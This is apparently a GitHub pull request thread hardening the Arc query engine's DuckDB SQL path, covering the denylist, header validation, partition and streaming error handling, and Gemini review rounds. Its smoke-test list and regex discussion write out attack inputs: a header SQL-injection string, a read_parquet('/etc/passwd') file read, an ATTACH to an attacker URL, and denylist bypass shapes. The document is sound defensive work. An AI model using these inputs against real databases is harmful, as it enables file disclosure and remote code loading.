fix(query): six critical-path hardening fixes from query-path review#414
fix(query): six critical-path hardening fixes from query-path review#414
Conversation
A 4-agent staff/principal-engineer review of the query execution path (mirror of the ingest review that produced PR #413) surfaced six issues we want addressed before 26.05.1 GA. All are fixed here. Bench delta is within the 5% no-regression budget on a 99.9M-row ClickBench GROUP BY workload (JSON p95 75.86ms→78.58ms, Arrow p95 76.14ms→78.36ms). C1 — Expanded SQL denylist + comment-strip + literal-mask normalisation. The query API guardrail previously gated only DDL/DML keywords. It now also gates ATTACH/DETACH/COPY/EXPORT/IMPORT DATABASE/PRAGMA/ SET <var>=/LOAD/INSTALL/CALL — session/extension/file-system ops that don't belong in a read-only query path. ValidateSQLRequest now strips comments and masks string literals before the regex check, so `DROP /* */ TABLE x` cannot interleave comments past token boundaries and `SELECT 'DROP TABLE x'` is not falsely rejected. Removed the dead (h *QueryHandler).validateSQL method (code-quality finding from the same review). Test matrix covers every blocked keyword + comment- injection + quoted-identifier false-positive cases. C2 — x-arc-database header validation + universal read_parquet path quoting. The header value lands inside read_parquet('<base>/<db>/...') storage paths Arc generates internally; in some edge cases a header containing a single quote or shell-active char could break out of the literal. New validateHeaderDatabase helper validates at every entry point (executeQuery, executeQueryArrow, estimateQuery). New quotePath() helper routes every read_parquet('PATH', ...) interpolation site through sqlutil.EscapeStringLiteral (added to internal/sql/mask.go as a single source of truth). Eight read_parquet sites in query.go converted. Tests cover SQLi vectors (quote, NUL, newline, comma, backslash, path-traversal) and boundary conditions. C3 — Reject direct read_parquet() in user SQL + extend CTE name regex. Arc's transformation layer is the only legitimate source of read_parquet — in some edge cases, a user query containing read_parquet directly produced zero extracted table references and bypassed the (database, measurement) RBAC pair-check. ValidateSQLRequest now rejects user SQL containing read_parquet(. Companion fix: the CTE-name extraction regex was extended to recognise the parenthesized column-list form (WITH foo(c1, c2) AS (...)), so a CTE name doesn't leak into the table-reference list. Tests cover read_parquet in JOIN, subqueries, CTEs, plus the new CTE column-list parse. C4 — Parallel-partition partial-failure now fails the whole request. When the parallel executor fans out a query across N partitions and one or more partition queries error, NewMergedRowIterator previously returned the surviving partitions' rows as a 200/success — a fraction of the result silently dropped. The handler now inspects per-partition Error after ExecutePartitioned and fails the request with HTTP 500 on any partition error. Companion fix in parallel_executor.go: the goroutine fan-out semaphore is acquired in the launch loop instead of inside each spawned goroutine, so a 10K-path query bounds in-flight goroutines at MaxConcurrentPartitions (default 4) instead of spawning 10K goroutines parked on the semaphore. C5 — Streaming-response error semantics. streamTypedJSON and streamArrowJSON previously returned only the row count; in some edge cases (Scan failures mid-stream, deferred *sql.Rows.Err(), context cancellation after the response envelope was already flushed) the loop silently `continue`'d and the caller marked the query Complete(rowCount). Both functions now return (int, error), perform a ctx.Err() check at every row/batch boundary, and check the iterator's deferred error after the loop. Callers route any error to IncQueryErrors, registry Fail() (or TimedOut() on context.DeadlineExceeded), and an Error log line. The HTTP status cannot be changed retroactively (headers already flushed) but operator-side observability is now correct. The Arrow IPC stream loop in executeQueryArrow adopts the same per-batch ctx-check pattern. C6 — Arrow IPC streaming memory pinned by deferred Release. The executeQueryArrow IPC loop used `defer batch.Release()` inside the for-reader.Next() body. Defers accumulate on the closure stack until the closure exits — for a 10M-row result with 10K-row batches, 1,000 deferred Release calls held all casted Arrow records alive until the entire stream completed. Releases each casted batch explicitly after ipcWriter.Write, restoring constant per-batch memory. The reader-owned input batch needs no Release; reader.Next() releases the prior record automatically. Build clean; full ./internal/api/... ./internal/query/... ./internal/queryregistry/... ./internal/database/... test suites pass. Smoke test against running Arc verified all 5 attack vectors are rejected (header SQLi, direct read_parquet, ATTACH RCE, PRAGMA hardening) and legitimate queries still work.
|
/gemini review @gemini-code-assist this PR addresses six critical-path findings from a 4-agent staff/principal-engineer review of Arc's query execution path — companion to the ingest-path review that landed as #413. Please pay particular attention to:
Bench delta on 99.9M-row ClickBench GROUP BY: JSON p95 +3.6%, Arrow p95 +2.9% — within the 5% budget. Smoke test against running Arc verified all four attack vectors (header SQLi, direct read_parquet, ATTACH RCE, PRAGMA hardening) reject correctly while legitimate queries return successfully. Looking for any findings. |
There was a problem hiding this comment.
Code Review
This pull request implements significant hardening of the query execution path, addressing security vulnerabilities and correctness issues identified during a staff-level review. Key changes include expanding the SQL denylist to block RCE-class operations, introducing robust input validation for the x-arc-database header, and ensuring safe path interpolation via a new quotePath helper. Additionally, the PR improves error handling for streaming responses and parallel partition execution to prevent silent data loss, and optimizes memory usage in Arrow IPC streaming. I have provided feedback on further tightening the SQL denylist regex and ensuring consistent context usage for streaming responses.
There was a problem hiding this comment.
Code Review
This pull request implements critical security hardening and correctness fixes for the query execution path. Key changes include expanding the SQL denylist with normalization (comment stripping and literal masking), validating the x-arc-database header, and preventing direct read_parquet calls in user SQL to enforce RBAC. Additionally, the PR ensures partial failures in streaming and parallel execution are surfaced as errors rather than silent partial results, and it fixes a memory leak in Arrow IPC streaming by releasing batches explicitly. Review feedback suggests using more idiomatic select blocks for context cancellation checks within streaming loops and simplifying error collection logic.
…elect Addresses 5 NEW gemini findings on PR #414 commit 244849b. One MEDIUM (G4 — simplify error-collection loop) was a no-op suggestion identical to the existing code; skipped. CRITICAL/security-critical (gemini G1) — SET regex bypassable: The previous \bSET\s+(?:GLOBAL\s+|...)?\w+\s*= form required an equals sign and a word after the optional scope keyword. DuckDB also accepts: - SET enable_external_access TO true (TO instead of =) - SET VARIABLE x = 1 (VARIABLE keyword) - RESET enable_external_access (mutates session state) All three slipped past the regex. Replaced the multi-form pattern with bare \bSET\b and added \bRESET\b. The query API is read-only so any session-state mutation is forbidden — bare-keyword match is correct here. New regression tests for all three bypass shapes. CRITICAL/security-critical (gemini G2) — CALL regex bypassable: \bCALL\s+\w+ required whitespace before the procedure name, but DuckDB accepts CALL(proc_name) with no space. Replaced with bare \bCALL\b. Regression test for the no-space form. MEDIUM (gemini G3) — queryMeasurement streamCtx: Switched from context.Background() to c.UserContext() so client disconnects propagate to per-row cancellation. Fasthttp keeps c.Context() alive across the SetBodyStreamWriter boundary so it's safe inside the async stream callback (consistent with the executeQuery and executeQueryArrow patterns). MEDIUM (gemini G5+G6) — idiomatic select for ctx cancellation: Replaced 'if ctx.Err() != nil' with 'select { case <-ctx.Done() }' + default at three call sites — streamTypedJSON, streamArrowJSON, and the Arrow IPC stream loop in executeQueryArrow. Required labeled-break (break scanLoop / batchLoop / streamLoop) because plain break inside select-in-for would only break the select. Same semantics, more idiomatic Go. Bench: two runs on warm state show JSON avg 72.64-73.85ms, p95 74.34-81.31ms; Arrow avg 72.30-73.66ms, p95 74.30-75.50ms — well within run-to-run jitter of baseline (73ms avg / 76ms p95). The "+3.6% JSON p95" delta from the initial commit appears to have been first-restart cold-cache noise, not a real regression. Build clean (default + -tags=duckdb_arrow); full test sweep across internal/api/... internal/query/... internal/queryregistry/... internal/database/... passes.
|
/gemini review @gemini-code-assist round 2 fixes pushed in commit 892d24c. All 5 actionable findings addressed; G4 (simplify error-collection loop) was a no-op suggestion — your snippet is identical to the existing code, so I skipped it. 🚨 G1 (CRITICAL) — SET regex bypassable:
🚨 G2 (CRITICAL) — CALL regex bypassable:
G3 (MEDIUM) — queryMeasurement ctx:
G5+G6 (MEDIUM) — idiomatic select for ctx:
Bench: two runs on warm state show JSON avg 72.6-73.9ms / p95 74.3-81.3ms; Arrow avg 72.3-73.7ms / p95 74.3-75.5ms — well within run-to-run jitter of baseline (73ms avg / 76ms p95). The "+3.6% JSON p95" delta from the initial commit appears to have been first-restart cold-cache noise. Looking for any final findings. |
There was a problem hiding this comment.
Code Review
This pull request implements comprehensive security hardening and correctness fixes for the query execution path. Key improvements include an expanded SQL denylist that blocks session and file-system operations, normalized SQL validation that strips comments and masks literals, and strict validation of the x-arc-database header to prevent path injection. The changes also ensure that partial failures in parallel and streaming queries are correctly surfaced as errors rather than silent successes. Furthermore, a memory leak in Arrow IPC streaming was resolved by explicitly releasing record batches, and the parallel executor was optimized to bound goroutine creation. I have no feedback to provide.
The C1 denylist bullet listed SET <var>=/CALL (the original narrower regex form). After gemini round 1 found two bypass shapes (SET TO, SET VARIABLE, RESET, CALL with no whitespace before paren), the regex simplified to bare-keyword anchors plus added RESET. Update the release notes to match.
Summary
A 4-agent staff/principal-engineer review of the query execution path (mirror of the ingest review that produced #413) surfaced 8 raw CRITICALs, 27 HIGH, 50 MEDIUM, 24 LOW findings — deduplicated to 6 unique CRITICALs, all addressed in this PR. The remaining HIGH/MEDIUM/LOW findings will be filed as separate issues in a follow-up.
The 6 Fixes
query.go:506-541query.go(8 sites),query_arrow.go:52,internal/sql/mask.gox-arc-databaseheader validation + universalread_parquetpath quotingquery.go:506+(read_parquet rejection),query.go:75(CTE regex)read_parquet()in user SQL + extend CTE name regexquery.go:1238+(caller),query/parallel_executor.go:97+query_json_writer.go:80,query_arrow_json.go:169,query_arrow.go:128,query.go(3 callsites)streamTypedJSON/streamArrowJSONreturn(int, error); per-row/per-batch ctx check; registry Fail/TimedOut on partial-failurequery_arrow.go:147batch.Releaseper iterationBench Delta (within 5% no-regression budget)
Workload:
SELECT RegionID, COUNT(*), SUM(ResolutionWidth) FROM clickbench.hits GROUP BY RegionID ORDER BY 2 DESC LIMIT 100on 99.9 M rows, 20 iterations per format.JSON and Arrow paths both go through
executeArrowJSONQuery→streamArrowJSONin the production build (-tags=duckdb_arrow), so the per-row ctx check instreamTypedJSON(only on the database/sql fallback) is NOT on the hot path. The most likely sources of the small delta: the expandedValidateSQLRequestpipeline (mask-literals + strip-comments + larger denylist regex + newuserSQLReadParquetPatterncheck) which now runs three regex passes per request instead of one, and thequotePath()helper allocations. All on the per-request path; well within the 5% budget.Test Plan
go test ./internal/api/... ./internal/query/... ./internal/queryregistry/... ./internal/database/...(no-tags)go test -tags=duckdb_arrow ./internal/api/...(Arrow code paths)go build ./internal/... ./cmd/...x-arc-database: evil', enable_external_access=true) UNION SELECT 1 FROM read_parquet('y→ 400invalid x-arc-database header: name contains invalid charactersSELECT * FROM read_parquet('/etc/passwd')→ 400Direct read_parquet() calls are not allowed in user SQLATTACH 'http://attacker/db' AS evil→ 400Dangerous SQL operation not allowedPRAGMA enable_external_access=true→ 400Dangerous SQL operation not allowedSELECT COUNT(*) FROM clickbench.hits→99,997,497rows, 1 msTestDangerousSQLPatternsextended with 13 RCE-class keyword cases + 4 case variations (now goes throughValidateSQLRequest, not raw regex)TestValidateSQLRequest_BypassesAndFalsePositives— comment-injection bypasses + literal/quoted-identifier false-positive tolerance + 6 read_parquet-direct-call rejectionsTestValidateHeaderDatabase— 18 cases covering legitimate values + 11 SQLi/path-traversal vectorsTestQuotePath— 6 cases pinning the escape contractTestExtractCTENamesextended with 3 cases for parenthesized CTE column-list formTestStreamTypedJSON_ReturnsErrorOnScanFailureand..._OnCtxCancelfor C5 contractReview-Agent Reports
The 4 agent reports (correctness / security / code quality / perf) are retained in the conversation transcript that drove this PR; the remaining HIGH/MEDIUM/LOW findings (~80 items after dedup against #313/#309/#308/#307/#334/#332/#331/#330/#352) will be filed as individual GitHub issues after this PR opens.
🤖 Generated with Claude Code